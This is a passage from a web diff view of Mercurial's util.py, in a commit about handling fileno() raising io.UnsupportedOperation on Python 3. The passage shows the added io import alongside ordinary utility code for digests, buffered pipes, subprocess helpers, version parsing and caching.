##// END OF EJS Templates
util: handle fileno() on Python 3 throwing io.UnsupportedOperation...
Augie Fackler -
r36450:1ca4e86c default
parent child Browse files
Show More
@@ -1,4009 +1,4013
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 import io
29 30 import itertools
30 31 import mmap
31 32 import os
32 33 import platform as pyplatform
33 34 import re as remod
34 35 import shutil
35 36 import signal
36 37 import socket
37 38 import stat
38 39 import string
39 40 import subprocess
40 41 import sys
41 42 import tempfile
42 43 import textwrap
43 44 import time
44 45 import traceback
45 46 import warnings
46 47 import zlib
47 48
48 49 from . import (
49 50 encoding,
50 51 error,
51 52 i18n,
52 53 node as nodemod,
53 54 policy,
54 55 pycompat,
55 56 urllibcompat,
56 57 )
57 58
58 59 base85 = policy.importmod(r'base85')
59 60 osutil = policy.importmod(r'osutil')
60 61 parsers = policy.importmod(r'parsers')
61 62
62 63 b85decode = base85.b85decode
63 64 b85encode = base85.b85encode
64 65
65 66 cookielib = pycompat.cookielib
66 67 empty = pycompat.empty
67 68 httplib = pycompat.httplib
68 69 pickle = pycompat.pickle
69 70 queue = pycompat.queue
70 71 socketserver = pycompat.socketserver
71 72 stderr = pycompat.stderr
72 73 stdin = pycompat.stdin
73 74 stdout = pycompat.stdout
74 75 stringio = pycompat.stringio
75 76 xmlrpclib = pycompat.xmlrpclib
76 77
77 78 httpserver = urllibcompat.httpserver
78 79 urlerr = urllibcompat.urlerr
79 80 urlreq = urllibcompat.urlreq
80 81
81 82 # workaround for win32mbcs
82 83 _filenamebytestr = pycompat.bytestr
83 84
84 85 def isatty(fp):
85 86 try:
86 87 return fp.isatty()
87 88 except AttributeError:
88 89 return False
89 90
90 91 # glibc determines buffering on first write to stdout - if we replace a TTY
91 92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 93 # buffering
93 94 if isatty(stdout):
94 95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 96
96 97 if pycompat.iswindows:
97 98 from . import windows as platform
98 99 stdout = platform.winstdout(stdout)
99 100 else:
100 101 from . import posix as platform
101 102
102 103 _ = i18n._
103 104
104 105 bindunixsocket = platform.bindunixsocket
105 106 cachestat = platform.cachestat
106 107 checkexec = platform.checkexec
107 108 checklink = platform.checklink
108 109 copymode = platform.copymode
109 110 executablepath = platform.executablepath
110 111 expandglobs = platform.expandglobs
111 112 explainexit = platform.explainexit
112 113 findexe = platform.findexe
113 114 getfsmountpoint = platform.getfsmountpoint
114 115 getfstype = platform.getfstype
115 116 gethgcmd = platform.gethgcmd
116 117 getuser = platform.getuser
117 118 getpid = os.getpid
118 119 groupmembers = platform.groupmembers
119 120 groupname = platform.groupname
120 121 hidewindow = platform.hidewindow
121 122 isexec = platform.isexec
122 123 isowner = platform.isowner
123 124 listdir = osutil.listdir
124 125 localpath = platform.localpath
125 126 lookupreg = platform.lookupreg
126 127 makedir = platform.makedir
127 128 nlinks = platform.nlinks
128 129 normpath = platform.normpath
129 130 normcase = platform.normcase
130 131 normcasespec = platform.normcasespec
131 132 normcasefallback = platform.normcasefallback
132 133 openhardlinks = platform.openhardlinks
133 134 oslink = platform.oslink
134 135 parsepatchoutput = platform.parsepatchoutput
135 136 pconvert = platform.pconvert
136 137 poll = platform.poll
137 138 popen = platform.popen
138 139 posixfile = platform.posixfile
139 140 quotecommand = platform.quotecommand
140 141 readpipe = platform.readpipe
141 142 rename = platform.rename
142 143 removedirs = platform.removedirs
143 144 samedevice = platform.samedevice
144 145 samefile = platform.samefile
145 146 samestat = platform.samestat
146 147 setbinary = platform.setbinary
147 148 setflags = platform.setflags
148 149 setsignalhandler = platform.setsignalhandler
149 150 shellquote = platform.shellquote
150 151 shellsplit = platform.shellsplit
151 152 spawndetached = platform.spawndetached
152 153 split = platform.split
153 154 sshargs = platform.sshargs
154 155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 156 statisexec = platform.statisexec
156 157 statislink = platform.statislink
157 158 testpid = platform.testpid
158 159 umask = platform.umask
159 160 unlink = platform.unlink
160 161 username = platform.username
161 162
162 163 try:
163 164 recvfds = osutil.recvfds
164 165 except AttributeError:
165 166 pass
166 167 try:
167 168 setprocname = osutil.setprocname
168 169 except AttributeError:
169 170 pass
170 171 try:
171 172 unblocksignal = osutil.unblocksignal
172 173 except AttributeError:
173 174 pass
174 175
175 176 # Python compatibility
176 177
177 178 _notset = object()
178 179
179 180 # disable Python's problematic floating point timestamps (issue4836)
180 181 # (Python hypocritically says you shouldn't change this behavior in
181 182 # libraries, and sure enough Mercurial is not a library.)
182 183 os.stat_float_times(False)
183 184
184 185 def safehasattr(thing, attr):
185 186 return getattr(thing, attr, _notset) is not _notset
186 187
187 188 def _rapply(f, xs):
188 189 if xs is None:
189 190 # assume None means non-value of optional data
190 191 return xs
191 192 if isinstance(xs, (list, set, tuple)):
192 193 return type(xs)(_rapply(f, x) for x in xs)
193 194 if isinstance(xs, dict):
194 195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 196 return f(xs)
196 197
197 198 def rapply(f, xs):
198 199 """Apply function recursively to every item preserving the data structure
199 200
200 201 >>> def f(x):
201 202 ... return 'f(%s)' % x
202 203 >>> rapply(f, None) is None
203 204 True
204 205 >>> rapply(f, 'a')
205 206 'f(a)'
206 207 >>> rapply(f, {'a'}) == {'f(a)'}
207 208 True
208 209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 211
211 212 >>> xs = [object()]
212 213 >>> rapply(pycompat.identity, xs) is xs
213 214 True
214 215 """
215 216 if f is pycompat.identity:
216 217 # fast path mainly for py2
217 218 return xs
218 219 return _rapply(f, xs)
219 220
220 221 def bytesinput(fin, fout, *args, **kwargs):
221 222 sin, sout = sys.stdin, sys.stdout
222 223 try:
223 224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 226 finally:
226 227 sys.stdin, sys.stdout = sin, sout
227 228
228 229 def bitsfrom(container):
229 230 bits = 0
230 231 for bit in container:
231 232 bits |= bit
232 233 return bits
233 234
234 235 # python 2.6 still have deprecation warning enabled by default. We do not want
235 236 # to display anything to standard user so detect if we are running test and
236 237 # only use python deprecation warning in this case.
237 238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 239 if _dowarn:
239 240 # explicitly unfilter our warning for python 2.7
240 241 #
241 242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 243 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 249
249 250 def nouideprecwarn(msg, version, stacklevel=1):
250 251 """Issue an python native deprecation warning
251 252
252 253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 254 """
254 255 if _dowarn:
255 256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 257 " update your code.)") % version
257 258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258 259
259 260 DIGESTS = {
260 261 'md5': hashlib.md5,
261 262 'sha1': hashlib.sha1,
262 263 'sha512': hashlib.sha512,
263 264 }
264 265 # List of digest types from strongest to weakest
265 266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266 267
267 268 for k in DIGESTS_BY_STRENGTH:
268 269 assert k in DIGESTS
269 270
270 271 class digester(object):
271 272 """helper to compute digests.
272 273
273 274 This helper can be used to compute one or more digests given their name.
274 275
275 276 >>> d = digester([b'md5', b'sha1'])
276 277 >>> d.update(b'foo')
277 278 >>> [k for k in sorted(d)]
278 279 ['md5', 'sha1']
279 280 >>> d[b'md5']
280 281 'acbd18db4cc2f85cedef654fccc4a4d8'
281 282 >>> d[b'sha1']
282 283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 284 >>> digester.preferred([b'md5', b'sha1'])
284 285 'sha1'
285 286 """
286 287
287 288 def __init__(self, digests, s=''):
288 289 self._hashes = {}
289 290 for k in digests:
290 291 if k not in DIGESTS:
291 292 raise Abort(_('unknown digest type: %s') % k)
292 293 self._hashes[k] = DIGESTS[k]()
293 294 if s:
294 295 self.update(s)
295 296
296 297 def update(self, data):
297 298 for h in self._hashes.values():
298 299 h.update(data)
299 300
300 301 def __getitem__(self, key):
301 302 if key not in DIGESTS:
302 303 raise Abort(_('unknown digest type: %s') % k)
303 304 return nodemod.hex(self._hashes[key].digest())
304 305
305 306 def __iter__(self):
306 307 return iter(self._hashes)
307 308
308 309 @staticmethod
309 310 def preferred(supported):
310 311 """returns the strongest digest type in both supported and DIGESTS."""
311 312
312 313 for k in DIGESTS_BY_STRENGTH:
313 314 if k in supported:
314 315 return k
315 316 return None
316 317
317 318 class digestchecker(object):
318 319 """file handle wrapper that additionally checks content against a given
319 320 size and digests.
320 321
321 322 d = digestchecker(fh, size, {'md5': '...'})
322 323
323 324 When multiple digests are given, all of them are validated.
324 325 """
325 326
326 327 def __init__(self, fh, size, digests):
327 328 self._fh = fh
328 329 self._size = size
329 330 self._got = 0
330 331 self._digests = dict(digests)
331 332 self._digester = digester(self._digests.keys())
332 333
333 334 def read(self, length=-1):
334 335 content = self._fh.read(length)
335 336 self._digester.update(content)
336 337 self._got += len(content)
337 338 return content
338 339
339 340 def validate(self):
340 341 if self._size != self._got:
341 342 raise Abort(_('size mismatch: expected %d, got %d') %
342 343 (self._size, self._got))
343 344 for k, v in self._digests.items():
344 345 if v != self._digester[k]:
345 346 # i18n: first parameter is a digest name
346 347 raise Abort(_('%s mismatch: expected %s, got %s') %
347 348 (k, v, self._digester[k]))
348 349
349 350 try:
350 351 buffer = buffer
351 352 except NameError:
352 353 def buffer(sliceable, offset=0, length=None):
353 354 if length is not None:
354 355 return memoryview(sliceable)[offset:offset + length]
355 356 return memoryview(sliceable)[offset:]
356 357
357 358 closefds = pycompat.isposix
358 359
359 360 _chunksize = 4096
360 361
361 362 class bufferedinputpipe(object):
362 363 """a manually buffered input pipe
363 364
364 365 Python will not let us use buffered IO and lazy reading with 'polling' at
365 366 the same time. We cannot probe the buffer state and select will not detect
366 367 that data are ready to read if they are already buffered.
367 368
368 369 This class let us work around that by implementing its own buffering
369 370 (allowing efficient readline) while offering a way to know if the buffer is
370 371 empty from the output (allowing collaboration of the buffer with polling).
371 372
372 373 This class lives in the 'util' module because it makes use of the 'os'
373 374 module from the python stdlib.
374 375 """
375 376
376 377 def __init__(self, input):
377 378 self._input = input
378 379 self._buffer = []
379 380 self._eof = False
380 381 self._lenbuf = 0
381 382
382 383 @property
383 384 def hasbuffer(self):
384 385 """True is any data is currently buffered
385 386
386 387 This will be used externally a pre-step for polling IO. If there is
387 388 already data then no polling should be set in place."""
388 389 return bool(self._buffer)
389 390
390 391 @property
391 392 def closed(self):
392 393 return self._input.closed
393 394
394 395 def fileno(self):
395 396 return self._input.fileno()
396 397
397 398 def close(self):
398 399 return self._input.close()
399 400
400 401 def read(self, size):
401 402 while (not self._eof) and (self._lenbuf < size):
402 403 self._fillbuffer()
403 404 return self._frombuffer(size)
404 405
405 406 def readline(self, *args, **kwargs):
406 407 if 1 < len(self._buffer):
407 408 # this should not happen because both read and readline end with a
408 409 # _frombuffer call that collapse it.
409 410 self._buffer = [''.join(self._buffer)]
410 411 self._lenbuf = len(self._buffer[0])
411 412 lfi = -1
412 413 if self._buffer:
413 414 lfi = self._buffer[-1].find('\n')
414 415 while (not self._eof) and lfi < 0:
415 416 self._fillbuffer()
416 417 if self._buffer:
417 418 lfi = self._buffer[-1].find('\n')
418 419 size = lfi + 1
419 420 if lfi < 0: # end of file
420 421 size = self._lenbuf
421 422 elif 1 < len(self._buffer):
422 423 # we need to take previous chunks into account
423 424 size += self._lenbuf - len(self._buffer[-1])
424 425 return self._frombuffer(size)
425 426
426 427 def _frombuffer(self, size):
427 428 """return at most 'size' data from the buffer
428 429
429 430 The data are removed from the buffer."""
430 431 if size == 0 or not self._buffer:
431 432 return ''
432 433 buf = self._buffer[0]
433 434 if 1 < len(self._buffer):
434 435 buf = ''.join(self._buffer)
435 436
436 437 data = buf[:size]
437 438 buf = buf[len(data):]
438 439 if buf:
439 440 self._buffer = [buf]
440 441 self._lenbuf = len(buf)
441 442 else:
442 443 self._buffer = []
443 444 self._lenbuf = 0
444 445 return data
445 446
446 447 def _fillbuffer(self):
447 448 """read data to the buffer"""
448 449 data = os.read(self._input.fileno(), _chunksize)
449 450 if not data:
450 451 self._eof = True
451 452 else:
452 453 self._lenbuf += len(data)
453 454 self._buffer.append(data)
454 455
455 456 def mmapread(fp):
456 457 try:
457 458 fd = getattr(fp, 'fileno', lambda: fp)()
458 459 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
459 460 except ValueError:
460 461 # Empty files cannot be mmapped, but mmapread should still work. Check
461 462 # if the file is empty, and if so, return an empty buffer.
462 463 if os.fstat(fd).st_size == 0:
463 464 return ''
464 465 raise
465 466
466 467 def popen2(cmd, env=None, newlines=False):
467 468 # Setting bufsize to -1 lets the system decide the buffer size.
468 469 # The default for bufsize is 0, meaning unbuffered. This leads to
469 470 # poor performance on Mac OS X: http://bugs.python.org/issue4194
470 471 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
471 472 close_fds=closefds,
472 473 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
473 474 universal_newlines=newlines,
474 475 env=env)
475 476 return p.stdin, p.stdout
476 477
477 478 def popen3(cmd, env=None, newlines=False):
478 479 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
479 480 return stdin, stdout, stderr
480 481
481 482 def popen4(cmd, env=None, newlines=False, bufsize=-1):
482 483 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
483 484 close_fds=closefds,
484 485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 486 stderr=subprocess.PIPE,
486 487 universal_newlines=newlines,
487 488 env=env)
488 489 return p.stdin, p.stdout, p.stderr, p
489 490
490 491 def version():
491 492 """Return version information if available."""
492 493 try:
493 494 from . import __version__
494 495 return __version__.version
495 496 except ImportError:
496 497 return 'unknown'
497 498
498 499 def versiontuple(v=None, n=4):
499 500 """Parses a Mercurial version string into an N-tuple.
500 501
501 502 The version string to be parsed is specified with the ``v`` argument.
502 503 If it isn't defined, the current Mercurial version string will be parsed.
503 504
504 505 ``n`` can be 2, 3, or 4. Here is how some version strings map to
505 506 returned values:
506 507
507 508 >>> v = b'3.6.1+190-df9b73d2d444'
508 509 >>> versiontuple(v, 2)
509 510 (3, 6)
510 511 >>> versiontuple(v, 3)
511 512 (3, 6, 1)
512 513 >>> versiontuple(v, 4)
513 514 (3, 6, 1, '190-df9b73d2d444')
514 515
515 516 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
516 517 (3, 6, 1, '190-df9b73d2d444+20151118')
517 518
518 519 >>> v = b'3.6'
519 520 >>> versiontuple(v, 2)
520 521 (3, 6)
521 522 >>> versiontuple(v, 3)
522 523 (3, 6, None)
523 524 >>> versiontuple(v, 4)
524 525 (3, 6, None, None)
525 526
526 527 >>> v = b'3.9-rc'
527 528 >>> versiontuple(v, 2)
528 529 (3, 9)
529 530 >>> versiontuple(v, 3)
530 531 (3, 9, None)
531 532 >>> versiontuple(v, 4)
532 533 (3, 9, None, 'rc')
533 534
534 535 >>> v = b'3.9-rc+2-02a8fea4289b'
535 536 >>> versiontuple(v, 2)
536 537 (3, 9)
537 538 >>> versiontuple(v, 3)
538 539 (3, 9, None)
539 540 >>> versiontuple(v, 4)
540 541 (3, 9, None, 'rc+2-02a8fea4289b')
541 542 """
542 543 if not v:
543 544 v = version()
544 545 parts = remod.split('[\+-]', v, 1)
545 546 if len(parts) == 1:
546 547 vparts, extra = parts[0], None
547 548 else:
548 549 vparts, extra = parts
549 550
550 551 vints = []
551 552 for i in vparts.split('.'):
552 553 try:
553 554 vints.append(int(i))
554 555 except ValueError:
555 556 break
556 557 # (3, 6) -> (3, 6, None)
557 558 while len(vints) < 3:
558 559 vints.append(None)
559 560
560 561 if n == 2:
561 562 return (vints[0], vints[1])
562 563 if n == 3:
563 564 return (vints[0], vints[1], vints[2])
564 565 if n == 4:
565 566 return (vints[0], vints[1], vints[2], extra)
566 567
567 568 # used by parsedate
568 569 defaultdateformats = (
569 570 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
570 571 '%Y-%m-%dT%H:%M', # without seconds
571 572 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
572 573 '%Y-%m-%dT%H%M', # without seconds
573 574 '%Y-%m-%d %H:%M:%S', # our common legal variant
574 575 '%Y-%m-%d %H:%M', # without seconds
575 576 '%Y-%m-%d %H%M%S', # without :
576 577 '%Y-%m-%d %H%M', # without seconds
577 578 '%Y-%m-%d %I:%M:%S%p',
578 579 '%Y-%m-%d %H:%M',
579 580 '%Y-%m-%d %I:%M%p',
580 581 '%Y-%m-%d',
581 582 '%m-%d',
582 583 '%m/%d',
583 584 '%m/%d/%y',
584 585 '%m/%d/%Y',
585 586 '%a %b %d %H:%M:%S %Y',
586 587 '%a %b %d %I:%M:%S%p %Y',
587 588 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
588 589 '%b %d %H:%M:%S %Y',
589 590 '%b %d %I:%M:%S%p %Y',
590 591 '%b %d %H:%M:%S',
591 592 '%b %d %I:%M:%S%p',
592 593 '%b %d %H:%M',
593 594 '%b %d %I:%M%p',
594 595 '%b %d %Y',
595 596 '%b %d',
596 597 '%H:%M:%S',
597 598 '%I:%M:%S%p',
598 599 '%H:%M',
599 600 '%I:%M%p',
600 601 )
601 602
602 603 extendeddateformats = defaultdateformats + (
603 604 "%Y",
604 605 "%Y-%m",
605 606 "%b",
606 607 "%b %Y",
607 608 )
608 609
609 610 def cachefunc(func):
610 611 '''cache the result of function calls'''
611 612 # XXX doesn't handle keywords args
612 613 if func.__code__.co_argcount == 0:
613 614 cache = []
614 615 def f():
615 616 if len(cache) == 0:
616 617 cache.append(func())
617 618 return cache[0]
618 619 return f
619 620 cache = {}
620 621 if func.__code__.co_argcount == 1:
621 622 # we gain a small amount of time because
622 623 # we don't need to pack/unpack the list
623 624 def f(arg):
624 625 if arg not in cache:
625 626 cache[arg] = func(arg)
626 627 return cache[arg]
627 628 else:
628 629 def f(*args):
629 630 if args not in cache:
630 631 cache[args] = func(*args)
631 632 return cache[args]
632 633
633 634 return f
634 635
635 636 class cow(object):
636 637 """helper class to make copy-on-write easier
637 638
638 639 Call preparewrite before doing any writes.
639 640 """
640 641
641 642 def preparewrite(self):
642 643 """call this before writes, return self or a copied new object"""
643 644 if getattr(self, '_copied', 0):
644 645 self._copied -= 1
645 646 return self.__class__(self)
646 647 return self
647 648
648 649 def copy(self):
649 650 """always do a cheap copy"""
650 651 self._copied = getattr(self, '_copied', 0) + 1
651 652 return self
652 653
653 654 class sortdict(collections.OrderedDict):
654 655 '''a simple sorted dictionary
655 656
656 657 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
657 658 >>> d2 = d1.copy()
658 659 >>> d2
659 660 sortdict([('a', 0), ('b', 1)])
660 661 >>> d2.update([(b'a', 2)])
661 662 >>> list(d2.keys()) # should still be in last-set order
662 663 ['b', 'a']
663 664 '''
664 665
665 666 def __setitem__(self, key, value):
666 667 if key in self:
667 668 del self[key]
668 669 super(sortdict, self).__setitem__(key, value)
669 670
670 671 if pycompat.ispypy:
671 672 # __setitem__() isn't called as of PyPy 5.8.0
672 673 def update(self, src):
673 674 if isinstance(src, dict):
674 675 src = src.iteritems()
675 676 for k, v in src:
676 677 self[k] = v
677 678
678 679 class cowdict(cow, dict):
679 680 """copy-on-write dict
680 681
681 682 Be sure to call d = d.preparewrite() before writing to d.
682 683
683 684 >>> a = cowdict()
684 685 >>> a is a.preparewrite()
685 686 True
686 687 >>> b = a.copy()
687 688 >>> b is a
688 689 True
689 690 >>> c = b.copy()
690 691 >>> c is a
691 692 True
692 693 >>> a = a.preparewrite()
693 694 >>> b is a
694 695 False
695 696 >>> a is a.preparewrite()
696 697 True
697 698 >>> c = c.preparewrite()
698 699 >>> b is c
699 700 False
700 701 >>> b is b.preparewrite()
701 702 True
702 703 """
703 704
704 705 class cowsortdict(cow, sortdict):
705 706 """copy-on-write sortdict
706 707
707 708 Be sure to call d = d.preparewrite() before writing to d.
708 709 """
709 710
710 711 class transactional(object):
711 712 """Base class for making a transactional type into a context manager."""
712 713 __metaclass__ = abc.ABCMeta
713 714
714 715 @abc.abstractmethod
715 716 def close(self):
716 717 """Successfully closes the transaction."""
717 718
718 719 @abc.abstractmethod
719 720 def release(self):
720 721 """Marks the end of the transaction.
721 722
722 723 If the transaction has not been closed, it will be aborted.
723 724 """
724 725
725 726 def __enter__(self):
726 727 return self
727 728
728 729 def __exit__(self, exc_type, exc_val, exc_tb):
729 730 try:
730 731 if exc_type is None:
731 732 self.close()
732 733 finally:
733 734 self.release()
734 735
735 736 @contextlib.contextmanager
736 737 def acceptintervention(tr=None):
737 738 """A context manager that closes the transaction on InterventionRequired
738 739
739 740 If no transaction was provided, this simply runs the body and returns
740 741 """
741 742 if not tr:
742 743 yield
743 744 return
744 745 try:
745 746 yield
746 747 tr.close()
747 748 except error.InterventionRequired:
748 749 tr.close()
749 750 raise
750 751 finally:
751 752 tr.release()
752 753
753 754 @contextlib.contextmanager
754 755 def nullcontextmanager():
755 756 yield
756 757
757 758 class _lrucachenode(object):
758 759 """A node in a doubly linked list.
759 760
760 761 Holds a reference to nodes on either side as well as a key-value
761 762 pair for the dictionary entry.
762 763 """
763 764 __slots__ = (u'next', u'prev', u'key', u'value')
764 765
765 766 def __init__(self):
766 767 self.next = None
767 768 self.prev = None
768 769
769 770 self.key = _notset
770 771 self.value = None
771 772
772 773 def markempty(self):
773 774 """Mark the node as emptied."""
774 775 self.key = _notset
775 776
776 777 class lrucachedict(object):
777 778 """Dict that caches most recent accesses and sets.
778 779
779 780 The dict consists of an actual backing dict - indexed by original
780 781 key - and a doubly linked circular list defining the order of entries in
781 782 the cache.
782 783
783 784 The head node is the newest entry in the cache. If the cache is full,
784 785 we recycle head.prev and make it the new head. Cache accesses result in
785 786 the node being moved to before the existing head and being marked as the
786 787 new head node.
787 788 """
788 789 def __init__(self, max):
789 790 self._cache = {}
790 791
791 792 self._head = head = _lrucachenode()
792 793 head.prev = head
793 794 head.next = head
794 795 self._size = 1
795 796 self._capacity = max
796 797
797 798 def __len__(self):
798 799 return len(self._cache)
799 800
800 801 def __contains__(self, k):
801 802 return k in self._cache
802 803
803 804 def __iter__(self):
804 805 # We don't have to iterate in cache order, but why not.
805 806 n = self._head
806 807 for i in range(len(self._cache)):
807 808 yield n.key
808 809 n = n.next
809 810
810 811 def __getitem__(self, k):
811 812 node = self._cache[k]
812 813 self._movetohead(node)
813 814 return node.value
814 815
815 816 def __setitem__(self, k, v):
816 817 node = self._cache.get(k)
817 818 # Replace existing value and mark as newest.
818 819 if node is not None:
819 820 node.value = v
820 821 self._movetohead(node)
821 822 return
822 823
823 824 if self._size < self._capacity:
824 825 node = self._addcapacity()
825 826 else:
826 827 # Grab the last/oldest item.
827 828 node = self._head.prev
828 829
829 830 # At capacity. Kill the old entry.
830 831 if node.key is not _notset:
831 832 del self._cache[node.key]
832 833
833 834 node.key = k
834 835 node.value = v
835 836 self._cache[k] = node
836 837 # And mark it as newest entry. No need to adjust order since it
837 838 # is already self._head.prev.
838 839 self._head = node
839 840
840 841 def __delitem__(self, k):
841 842 node = self._cache.pop(k)
842 843 node.markempty()
843 844
844 845 # Temporarily mark as newest item before re-adjusting head to make
845 846 # this node the oldest item.
846 847 self._movetohead(node)
847 848 self._head = node.next
848 849
849 850 # Additional dict methods.
850 851
851 852 def get(self, k, default=None):
852 853 try:
853 854 return self._cache[k].value
854 855 except KeyError:
855 856 return default
856 857
857 858 def clear(self):
858 859 n = self._head
859 860 while n.key is not _notset:
860 861 n.markempty()
861 862 n = n.next
862 863
863 864 self._cache.clear()
864 865
865 866 def copy(self):
866 867 result = lrucachedict(self._capacity)
867 868 n = self._head.prev
868 869 # Iterate in oldest-to-newest order, so the copy has the right ordering
869 870 for i in range(len(self._cache)):
870 871 result[n.key] = n.value
871 872 n = n.prev
872 873 return result
873 874
874 875 def _movetohead(self, node):
875 876 """Mark a node as the newest, making it the new head.
876 877
877 878 When a node is accessed, it becomes the freshest entry in the LRU
878 879 list, which is denoted by self._head.
879 880
880 881 Visually, let's make ``N`` the new head node (* denotes head):
881 882
882 883 previous/oldest <-> head <-> next/next newest
883 884
884 885 ----<->--- A* ---<->-----
885 886 | |
886 887 E <-> D <-> N <-> C <-> B
887 888
888 889 To:
889 890
890 891 ----<->--- N* ---<->-----
891 892 | |
892 893 E <-> D <-> C <-> B <-> A
893 894
894 895 This requires the following moves:
895 896
896 897 C.next = D (node.prev.next = node.next)
897 898 D.prev = C (node.next.prev = node.prev)
898 899 E.next = N (head.prev.next = node)
899 900 N.prev = E (node.prev = head.prev)
900 901 N.next = A (node.next = head)
901 902 A.prev = N (head.prev = node)
902 903 """
903 904 head = self._head
904 905 # C.next = D
905 906 node.prev.next = node.next
906 907 # D.prev = C
907 908 node.next.prev = node.prev
908 909 # N.prev = E
909 910 node.prev = head.prev
910 911 # N.next = A
911 912 # It is tempting to do just "head" here, however if node is
912 913 # adjacent to head, this will do bad things.
913 914 node.next = head.prev.next
914 915 # E.next = N
915 916 node.next.prev = node
916 917 # A.prev = N
917 918 node.prev.next = node
918 919
919 920 self._head = node
920 921
921 922 def _addcapacity(self):
922 923 """Add a node to the circular linked list.
923 924
924 925 The new node is inserted before the head node.
925 926 """
926 927 head = self._head
927 928 node = _lrucachenode()
928 929 head.prev.next = node
929 930 node.prev = head.prev
930 931 node.next = head
931 932 head.prev = node
932 933 self._size += 1
933 934 return node
934 935
935 936 def lrucachefunc(func):
936 937 '''cache most recent results of function calls'''
937 938 cache = {}
938 939 order = collections.deque()
939 940 if func.__code__.co_argcount == 1:
940 941 def f(arg):
941 942 if arg not in cache:
942 943 if len(cache) > 20:
943 944 del cache[order.popleft()]
944 945 cache[arg] = func(arg)
945 946 else:
946 947 order.remove(arg)
947 948 order.append(arg)
948 949 return cache[arg]
949 950 else:
950 951 def f(*args):
951 952 if args not in cache:
952 953 if len(cache) > 20:
953 954 del cache[order.popleft()]
954 955 cache[args] = func(*args)
955 956 else:
956 957 order.remove(args)
957 958 order.append(args)
958 959 return cache[args]
959 960
960 961 return f
961 962
962 963 class propertycache(object):
963 964 def __init__(self, func):
964 965 self.func = func
965 966 self.name = func.__name__
966 967 def __get__(self, obj, type=None):
967 968 result = self.func(obj)
968 969 self.cachevalue(obj, result)
969 970 return result
970 971
971 972 def cachevalue(self, obj, value):
972 973 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
973 974 obj.__dict__[self.name] = value
974 975
975 976 def clearcachedproperty(obj, prop):
976 977 '''clear a cached property value, if one has been set'''
977 978 if prop in obj.__dict__:
978 979 del obj.__dict__[prop]
979 980
980 981 def pipefilter(s, cmd):
981 982 '''filter string S through command CMD, returning its output'''
982 983 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
983 984 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
984 985 pout, perr = p.communicate(s)
985 986 return pout
986 987
987 988 def tempfilter(s, cmd):
988 989 '''filter string S through a pair of temporary files with CMD.
989 990 CMD is used as a template to create the real command to be run,
990 991 with the strings INFILE and OUTFILE replaced by the real names of
991 992 the temporary files generated.'''
992 993 inname, outname = None, None
993 994 try:
994 995 infd, inname = tempfile.mkstemp(prefix='hg-filter-in-')
995 996 fp = os.fdopen(infd, pycompat.sysstr('wb'))
996 997 fp.write(s)
997 998 fp.close()
998 999 outfd, outname = tempfile.mkstemp(prefix='hg-filter-out-')
999 1000 os.close(outfd)
1000 1001 cmd = cmd.replace('INFILE', inname)
1001 1002 cmd = cmd.replace('OUTFILE', outname)
1002 1003 code = os.system(cmd)
1003 1004 if pycompat.sysplatform == 'OpenVMS' and code & 1:
1004 1005 code = 0
1005 1006 if code:
1006 1007 raise Abort(_("command '%s' failed: %s") %
1007 1008 (cmd, explainexit(code)))
1008 1009 return readfile(outname)
1009 1010 finally:
1010 1011 try:
1011 1012 if inname:
1012 1013 os.unlink(inname)
1013 1014 except OSError:
1014 1015 pass
1015 1016 try:
1016 1017 if outname:
1017 1018 os.unlink(outname)
1018 1019 except OSError:
1019 1020 pass
1020 1021
1021 1022 filtertable = {
1022 1023 'tempfile:': tempfilter,
1023 1024 'pipe:': pipefilter,
1024 1025 }
1025 1026
1026 1027 def filter(s, cmd):
1027 1028 "filter a string through a command that transforms its input to its output"
